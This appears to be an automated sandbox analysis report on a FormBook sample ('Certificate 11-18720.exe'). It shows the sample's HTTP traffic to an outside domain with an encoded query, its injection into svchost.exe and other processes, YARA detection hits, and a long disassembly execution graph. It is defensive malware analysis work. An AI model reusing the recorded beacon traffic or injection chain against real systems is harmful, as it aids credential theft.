                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.empowermedeco.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:15:15.645354033 CET1226INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:15 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:12:11:13
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Users\user\Desktop\Certificate 11-18720.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Certificate 11-18720.exe"
                                                                                  Imagebase:0x5c0000
                                                                                  File size:1'197'568 bytes
                                                                                  MD5 hash:287E61624E5C839FF4B366E1969B3BCE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:12:11:14
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Certificate 11-18720.exe"
                                                                                  Imagebase:0xee0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:12:11:22
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe"
                                                                                  Imagebase:0x100000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:12:11:24
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                  Imagebase:0x990000
                                                                                  File size:22'016 bytes
                                                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:12:11:37
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe"
                                                                                  Imagebase:0x100000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:12:11:49
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff6bf500000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:4%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:8.2%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:161
                                                                                    execution_graph 92199 5e5dfd 92200 5e5e09 __getstream 92199->92200 92236 5e7eeb GetStartupInfoW 92200->92236 92202 5e5e0e 92238 5e9ca7 GetProcessHeap 92202->92238 92204 5e5e66 92205 5e5e71 92204->92205 92323 5e5f4d 47 API calls 3 library calls 92204->92323 92239 5e7b47 92205->92239 92208 5e5e77 92209 5e5e82 __RTC_Initialize 92208->92209 92324 5e5f4d 47 API calls 3 library calls 92208->92324 92260 5eacb3 92209->92260 92212 5e5e91 92213 5e5e9d GetCommandLineW 92212->92213 92325 5e5f4d 47 API calls 3 library calls 92212->92325 92279 5f2e7d GetEnvironmentStringsW 92213->92279 92216 5e5e9c 92216->92213 92220 5e5ec2 92292 5f2cb4 92220->92292 92223 5e5ec8 92224 5e5ed3 92223->92224 92327 5e115b 47 API calls 3 library calls 92223->92327 92306 5e1195 92224->92306 92227 5e5edb 92228 5e5ee6 __wwincmdln 92227->92228 92328 5e115b 47 API calls 3 library calls 92227->92328 92310 5c3a0f 92228->92310 92231 5e5efa 92232 5e5f09 92231->92232 92329 5e13f1 47 API calls _doexit 92231->92329 92330 5e1186 47 API calls _doexit 92232->92330 92235 5e5f0e __getstream 92237 5e7f01 92236->92237 92237->92202 92238->92204 92331 5e123a 30 API calls 2 library calls 92239->92331 92241 5e7b4c 92332 5e7e23 InitializeCriticalSectionAndSpinCount 92241->92332 92243 5e7b51 92244 5e7b55 92243->92244 92334 5e7e6d TlsAlloc 92243->92334 92333 5e7bbd 50 API calls 2 library calls 92244->92333 92247 5e7b5a 92247->92208 92248 5e7b67 92248->92244 92249 5e7b72 92248->92249 92335 5e6986 92249->92335 92252 5e7bb4 92343 5e7bbd 50 API calls 2 library calls 92252->92343 92255 5e7bb9 92255->92208 92256 5e7b93 92256->92252 92257 5e7b99 92256->92257 92342 5e7a94 47 API calls 4 library calls 92257->92342 92259 5e7ba1 GetCurrentThreadId 92259->92208 92261 5eacbf __getstream 92260->92261 92352 5e7cf4 92261->92352 92263 5eacc6 92264 5e6986 __calloc_crt 47 API calls 92263->92264 92266 5eacd7 92264->92266 92265 5ead42 GetStartupInfoW 92270 5eae80 92265->92270 92275 5ead57 92265->92275 92266->92265 92267 5eace2 @_EH4_CallFilterFunc@8 __getstream 92266->92267 92267->92212 92268 5eaf44 92359 5eaf58 LeaveCriticalSection _doexit 92268->92359 92270->92268 92271 5eaec9 GetStdHandle 92270->92271 92274 5eaedb GetFileType 92270->92274 92276 5eaf08 InitializeCriticalSectionAndSpinCount 92270->92276 92271->92270 92272 5eada5 92272->92270 92277 5eadd7 GetFileType 92272->92277 92278 5eade5 InitializeCriticalSectionAndSpinCount 92272->92278 92273 5e6986 __calloc_crt 47 API calls 92273->92275 92274->92270 92275->92270 92275->92272 92275->92273 92276->92270 92277->92272 92277->92278 92278->92272 92280 5f2e8e 92279->92280 92281 5e5ead 92279->92281 92398 5e69d0 47 API calls _W_store_winword 92280->92398 92286 5f2a7b GetModuleFileNameW 92281->92286 92284 5f2eca FreeEnvironmentStringsW 92284->92281 92285 5f2eb4 ___crtGetEnvironmentStringsW 92285->92284 92287 5f2aaf _wparse_cmdline 92286->92287 92288 5e5eb7 92287->92288 92289 5f2ae9 92287->92289 92288->92220 92326 5e115b 47 API calls 3 library calls 92288->92326 92399 5e69d0 47 API calls _W_store_winword 92289->92399 92291 5f2aef _wparse_cmdline 92291->92288 92293 5f2ccd __NMSG_WRITE 92292->92293 92297 5f2cc5 92292->92297 92294 5e6986 __calloc_crt 47 API calls 92293->92294 92302 5f2cf6 __NMSG_WRITE 92294->92302 92295 5f2d4d 92296 5e1c9d _free 47 API calls 92295->92296 92296->92297 92297->92223 92298 5e6986 __calloc_crt 47 API calls 92298->92302 92299 5f2d72 92301 5e1c9d _free 47 API calls 92299->92301 92301->92297 92302->92295 92302->92297 92302->92298 92302->92299 92303 5f2d89 92302->92303 92400 5f2567 47 API calls __beginthread 92302->92400 92401 5e6e20 IsProcessorFeaturePresent 92303->92401 92305 5f2d95 92305->92223 92307 5e11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92306->92307 92309 5e11e0 __IsNonwritableInCurrentImage 92307->92309 92424 5e0f0a 52 API calls __cinit 92307->92424 92309->92227 92311 5c3a29 92310->92311 92312 631ebf 92310->92312 92313 5c3a63 IsThemeActive 92311->92313 92425 5e1405 92313->92425 92317 5c3a8f 92437 5c3adb SystemParametersInfoW SystemParametersInfoW 92317->92437 92319 5c3a9b 92438 5c3d19 92319->92438 92321 5c3aa3 SystemParametersInfoW 92322 5c3ac8 92321->92322 92322->92231 92323->92205 92324->92209 92325->92216 92329->92232 92330->92235 92331->92241 92332->92243 92333->92247 92334->92248 92338 5e698d 92335->92338 92337 5e69ca 92337->92252 92341 5e7ec9 TlsSetValue 92337->92341 92338->92337 92339 5e69ab Sleep 92338->92339 92344 5f30aa 92338->92344 92340 5e69c2 92339->92340 92340->92337 92340->92338 92341->92256 92342->92259 92343->92255 92345 5f30b5 92344->92345 92349 5f30d0 __calloc_impl 92344->92349 92346 5f30c1 92345->92346 92345->92349 92351 5e7c0e 47 API calls __getptd_noexit 92346->92351 92347 5f30e0 HeapAlloc 92347->92349 92350 5f30c6 92347->92350 92349->92347 92349->92350 92350->92338 92351->92350 92353 5e7d18 EnterCriticalSection 92352->92353 92354 5e7d05 92352->92354 92353->92263 92360 5e7d7c 92354->92360 92356 5e7d0b 92356->92353 92384 5e115b 47 API calls 3 library calls 92356->92384 92359->92267 92361 5e7d88 __getstream 92360->92361 92362 5e7da9 92361->92362 92363 5e7d91 92361->92363 92366 5e7e11 __getstream 92362->92366 92377 5e7da7 92362->92377 92385 5e81c2 47 API calls __NMSG_WRITE 92363->92385 92365 5e7d96 92386 5e821f 47 API calls 5 library calls 92365->92386 92366->92356 92369 5e7dbd 92371 5e7dc4 92369->92371 92372 5e7dd3 92369->92372 92370 5e7d9d 92387 5e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92370->92387 92389 5e7c0e 47 API calls __getptd_noexit 92371->92389 92373 5e7cf4 __lock 46 API calls 92372->92373 92376 5e7dda 92373->92376 92379 5e7dfe 92376->92379 92380 5e7de9 InitializeCriticalSectionAndSpinCount 92376->92380 92377->92362 92388 5e69d0 47 API calls _W_store_winword 92377->92388 92378 5e7dc9 92378->92366 92390 5e1c9d 92379->92390 92381 5e7e04 92380->92381 92396 5e7e1a LeaveCriticalSection _doexit 92381->92396 92385->92365 92386->92370 92388->92369 92389->92378 92391 5e1ca6 RtlFreeHeap 92390->92391 92392 5e1ccf __dosmaperr 92390->92392 92391->92392 92393 5e1cbb 92391->92393 92392->92381 92397 5e7c0e 47 API calls __getptd_noexit 92393->92397 92395 5e1cc1 GetLastError 92395->92392 92396->92366 92397->92395 92398->92285 92399->92291 92400->92302 92402 5e6e2b 92401->92402 92407 5e6cb5 92402->92407 92406 5e6e46 92406->92305 92408 5e6ccf _memset __call_reportfault 92407->92408 92409 5e6cef IsDebuggerPresent 92408->92409 92415 5e81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92409->92415 92411 5e6db3 __call_reportfault 92416 5ea70c 92411->92416 92413 5e6dd6 92414 5e8197 GetCurrentProcess TerminateProcess 92413->92414 92414->92406 92415->92411 92417 5ea716 IsProcessorFeaturePresent 92416->92417 92418 5ea714 92416->92418 92420 5f37b0 92417->92420 92418->92413 92423 5f375f 5 API calls 2 library calls 92420->92423 92422 5f3893 92422->92413 92423->92422 92424->92309 92426 5e7cf4 __lock 47 API calls 92425->92426 92427 5e1410 92426->92427 92490 5e7e58 LeaveCriticalSection 92427->92490 92429 5c3a88 92430 5e146d 92429->92430 92431 5e1477 92430->92431 92432 5e1491 92430->92432 92431->92432 92491 5e7c0e 47 API calls __getptd_noexit 92431->92491 92432->92317 92434 5e1481 92492 5e6e10 8 API calls __beginthread 92434->92492 92436 5e148c 92436->92317 92437->92319 92439 5c3d26 __ftell_nolock 92438->92439 92493 5cd7f7 92439->92493 92443 5c3d57 IsDebuggerPresent 92444 631cc1 MessageBoxA 92443->92444 92445 5c3d65 92443->92445 92448 631cd9 92444->92448 92446 5c3e3a 92445->92446 92445->92448 92449 5c3d82 92445->92449 92447 5c3e41 SetCurrentDirectoryW 92446->92447 92452 5c3e4e Mailbox 92447->92452 92695 5dc682 48 API calls 92448->92695 92572 5c40e5 92449->92572 92452->92321 92453 631ce9 92458 631cff SetCurrentDirectoryW 92453->92458 92455 5c3da0 GetFullPathNameW 92588 5c6a63 92455->92588 92457 5c3ddb 92599 5c6430 92457->92599 92458->92452 92461 5c3df6 92462 5c3e00 92461->92462 92696 6071fa AllocateAndInitializeSid CheckTokenMembership FreeSid 92461->92696 92615 5c3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 92462->92615 92465 631d1c 92465->92462 92469 631d2d 92465->92469 92468 5c3e0a 92470 5c3e1f 92468->92470 92623 5c4ffc 92468->92623 92697 5c5374 92469->92697 92633 5ce8d0 92470->92633 92472 631d35 92704 5cce19 92472->92704 92477 631d42 92478 631d49 92477->92478 92479 631d6e 92477->92479 92710 5c518c 92478->92710 92482 5c518c 48 API calls 92479->92482 92484 631d6a GetForegroundWindow ShellExecuteW 92482->92484 92488 631d9e Mailbox 92484->92488 92488->92446 92490->92429 92491->92434 92492->92436 92729 5df4ea 92493->92729 92495 5cd818 92496 5df4ea 48 API calls 92495->92496 92497 5c3d31 GetCurrentDirectoryW 92496->92497 92498 5c61ca 92497->92498 92760 5de99b 92498->92760 92502 5c61eb 92503 5c5374 50 API calls 92502->92503 92504 5c61ff 92503->92504 92505 5cce19 48 API calls 92504->92505 92506 5c620c 92505->92506 92777 5c39db 92506->92777 92508 5c6216 Mailbox 92789 5c6eed 92508->92789 92513 5cce19 48 API calls 92514 5c6244 92513->92514 92796 5cd6e9 92514->92796 92516 5c6254 Mailbox 92517 5cce19 48 API calls 92516->92517 92518 5c627c 92517->92518 92519 5cd6e9 55 API calls 92518->92519 92520 5c628f Mailbox 92519->92520 92521 5cce19 48 API calls 92520->92521 92522 5c62a0 92521->92522 92800 5cd645 92522->92800 92524 5c62b2 Mailbox 92525 5cd7f7 48 API calls 92524->92525 92526 5c62c5 92525->92526 92810 5c63fc 92526->92810 92530 5c62df 92531 5c62e9 92530->92531 92532 631c08 92530->92532 92534 5e0fa7 _W_store_winword 59 API calls 92531->92534 92533 5c63fc 48 API calls 92532->92533 92535 631c1c 92533->92535 92536 5c62f4 92534->92536 92538 5c63fc 48 API calls 92535->92538 92536->92535 92537 5c62fe 92536->92537 92539 5e0fa7 _W_store_winword 59 API calls 92537->92539 92540 631c38 92538->92540 92541 5c6309 92539->92541 92544 5c5374 50 API calls 92540->92544 92541->92540 92542 5c6313 92541->92542 92543 5e0fa7 _W_store_winword 59 API calls 92542->92543 92545 5c631e 92543->92545 92546 631c5d 92544->92546 92547 5c635f 92545->92547 92549 631c86 92545->92549 92552 5c63fc 48 API calls 92545->92552 92548 5c63fc 48 API calls 92546->92548 92547->92549 92550 5c636c 92547->92550 92551 631c69 92548->92551 92553 5c6eed 48 API calls 92549->92553 92826 5dc050 92550->92826 92554 5c6eed 48 API calls 92551->92554 92555 5c6342 92552->92555 92556 631ca8 92553->92556 92558 631c77 92554->92558 92560 5c6eed 48 API calls 92555->92560 92561 5c63fc 48 API calls 92556->92561 92559 5c63fc 48 API calls 92558->92559 92559->92549 92563 5c6350 92560->92563 92564 631cb5 92561->92564 92562 5c6384 92837 5d1b90 92562->92837 92566 5c63fc 48 API calls 92563->92566 92564->92564 92566->92547 92567 5d1b90 48 API calls 92569 5c6394 92567->92569 92569->92567 92570 5c63fc 48 API calls 92569->92570 92571 5c63d6 Mailbox 92569->92571 92853 5c6b68 48 API calls 92569->92853 92570->92569 92571->92443 92573 5c40f2 __ftell_nolock 92572->92573 92574 5c410b 92573->92574 92575 63370e _memset 92573->92575 93362 5c660f 92574->93362 92577 63372a GetOpenFileNameW 92575->92577 92579 633779 92577->92579 92581 5c6a63 48 API calls 92579->92581 92583 63378e 92581->92583 92583->92583 92585 5c4129 93387 5c4139 92585->93387 92589 5c6adf 92588->92589 92591 5c6a6f __NMSG_WRITE 92588->92591 92590 5cb18b 48 API calls 92589->92590 92597 5c6ab6 ___crtGetEnvironmentStringsW 92590->92597 92592 5c6a8b 92591->92592 92593 5c6ad7 92591->92593 93596 5c6b4a 92592->93596 93599 5cc369 48 API calls 92593->93599 92596 5c6a95 92598 5dee75 48 API calls 92596->92598 92597->92457 92598->92597 92600 5c643d __ftell_nolock 92599->92600 93600 5c4c75 92600->93600 92602 5c6442 92603 5c3dee 92602->92603 93611 5c5928 86 API calls 92602->93611 92603->92453 92603->92461 92605 5c644f 92605->92603 93612 5c5798 88 API calls Mailbox 92605->93612 92607 5c6458 92607->92603 92608 5c645c GetFullPathNameW 92607->92608 92609 5c6a63 48 API calls 92608->92609 92610 5c6488 92609->92610 92611 5c6a63 48 API calls 92610->92611 92612 5c6495 92611->92612 92613 635dcf _wcscat 92612->92613 92614 5c6a63 48 API calls 92612->92614 92614->92603 92616 5c3ed8 92615->92616 92617 631cba 92615->92617 93670 5c4024 92616->93670 92621 5c3e05 92622 5c36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 92621->92622 92622->92468 92624 5c5027 _memset 92623->92624 93675 5c4c30 92624->93675 92627 5c50ac 92629 5c50ca Shell_NotifyIconW 92627->92629 92630 633d28 Shell_NotifyIconW 92627->92630 93679 5c51af 92629->93679 92632 5c50df 92632->92470 92634 5ce8f6 92633->92634 92666 5ce906 Mailbox 92633->92666 92635 5ced52 92634->92635 92634->92666 93875 5de3cd 335 API calls 92635->93875 92636 60cc5c 86 API calls 92636->92666 92638 5c3e2a 92638->92446 92694 5c3847 Shell_NotifyIconW _memset 92638->92694 92640 5ced63 92640->92638 92641 5ced70 92640->92641 93877 5de312 335 API calls Mailbox 92641->93877 92642 5ce94c PeekMessageW 92642->92666 92644 5ced77 LockWindowUpdate DestroyWindow GetMessageW 92644->92638 92647 5ceda9 92644->92647 92645 63526e Sleep 92645->92666 92649 6359ef TranslateMessage DispatchMessageW GetMessageW 92647->92649 92648 5cebc7 92648->92638 93876 5c2ff6 16 API calls 92648->93876 92649->92649 92651 635a1f 92649->92651 92651->92638 92652 5ced21 PeekMessageW 92652->92666 92653 5cebf7 timeGetTime 92653->92666 92655 5c6eed 48 API calls 92655->92666 92656 5ced3a TranslateMessage DispatchMessageW 92656->92652 92657 635557 WaitForSingleObject 92659 635574 GetExitCodeProcess CloseHandle 92657->92659 92657->92666 92658 5df4ea 48 API calls 92658->92666 92659->92666 92660 5cd7f7 48 API calls 92667 635429 Mailbox 92660->92667 92661 63588f Sleep 92661->92667 92662 5cedae timeGetTime 93878 5c1caa 49 API calls 92662->93878 92663 635733 Sleep 92663->92667 92666->92636 92666->92642 92666->92645 92666->92648 92666->92652 92666->92653 92666->92655 92666->92656 92666->92657 92666->92658 92666->92661 92666->92662 92666->92663 92666->92667 92671 5c2aae 311 API calls 92666->92671 92675 635445 Sleep 92666->92675 92681 5c1caa 49 API calls 92666->92681 92692 5cce19 48 API calls 92666->92692 92693 5cd6e9 55 API calls 92666->92693 93702 5cef00 92666->93702 93710 5cf110 92666->93710 93775 5d45e0 92666->93775 93792 5de244 92666->93792 93797 5ddc5f 92666->93797 93802 5ceed0 335 API calls Mailbox 92666->93802 93803 5d3200 92666->93803 93879 628d23 48 API calls 92666->93879 93883 5cfe30 92666->93883 92667->92660 92667->92666 92669 635926 GetExitCodeProcess 92667->92669 92672 5ddc38 timeGetTime 92667->92672 92667->92675 92676 635432 Sleep 92667->92676 92677 628c4b 108 API calls 92667->92677 92678 5c2c79 107 API calls 92667->92678 92680 6359ae Sleep 92667->92680 92682 5cce19 48 API calls 92667->92682 92686 5cd6e9 55 API calls 92667->92686 93880 604cbe 49 API calls Mailbox 92667->93880 93881 5c1caa 49 API calls 92667->93881 93882 5c2aae 335 API calls 92667->93882 93912 61ccb2 50 API calls 92667->93912 93913 607a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 92667->93913 93914 606532 63 API calls 3 library calls 92667->93914 92673 635952 CloseHandle 92669->92673 92674 63593c WaitForSingleObject 92669->92674 92671->92666 92672->92667 92673->92667 92674->92666 92674->92673 92675->92666 92676->92675 92677->92667 92678->92667 92680->92666 92681->92666 92682->92667 92686->92667 92692->92666 92693->92666 92694->92446 92695->92453 92696->92465 92698 5ef8a0 __ftell_nolock 92697->92698 92699 5c5381 GetModuleFileNameW 92698->92699 92700 5cce19 48 API calls 92699->92700 92701 5c53a7 92700->92701 92702 5c660f 49 API calls 92701->92702 92703 5c53b1 Mailbox 92702->92703 92703->92472 92705 5cce28 __NMSG_WRITE 92704->92705 92706 5dee75 48 API calls 92705->92706 92707 5cce50 ___crtGetEnvironmentStringsW 92706->92707 92708 5df4ea 48 API calls 92707->92708 92709 5cce66 92708->92709 92709->92477 92711 5c5197 92710->92711 92712 5c519f 92711->92712 92713 631ace 92711->92713 94211 5c5130 92712->94211 92715 5c6b4a 48 API calls 92713->92715 92717 631adb __NMSG_WRITE 92715->92717 92716 5c51aa 92720 5c510d 92716->92720 92718 5dee75 48 API calls 92717->92718 92719 631b07 ___crtGetEnvironmentStringsW 92718->92719 92721 5c511f 92720->92721 92722 631be7 92720->92722 92732 5df4f2 __calloc_impl 92729->92732 92731 5df50c 92731->92495 92732->92731 92733 5df50e std::exception::exception 92732->92733 92738 5e395c 92732->92738 92752 5e6805 RaiseException 92733->92752 92735 5df538 92753 5e673b 47 API calls _free 92735->92753 92737 5df54a 92737->92495 92739 5e39d7 __calloc_impl 92738->92739 92747 5e3968 __calloc_impl 92738->92747 92759 5e7c0e 47 API calls __getptd_noexit 92739->92759 92742 5e399b RtlAllocateHeap 92742->92747 92751 5e39cf 92742->92751 92744 5e39c3 92757 5e7c0e 47 API calls __getptd_noexit 92744->92757 92747->92742 92747->92744 92748 5e39c1 92747->92748 92749 5e3973 92747->92749 92758 5e7c0e 47 API calls __getptd_noexit 92748->92758 92749->92747 92754 5e81c2 47 API calls __NMSG_WRITE 92749->92754 92755 5e821f 47 API calls 5 library calls 92749->92755 92756 5e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92749->92756 92751->92732 92752->92735 92753->92737 92754->92749 92755->92749 92757->92748 92758->92751 92759->92751 92761 5cd7f7 48 API calls 92760->92761 92762 5c61db 92761->92762 92763 5c6009 92762->92763 92764 5c6016 __ftell_nolock 92763->92764 92765 5c6a63 48 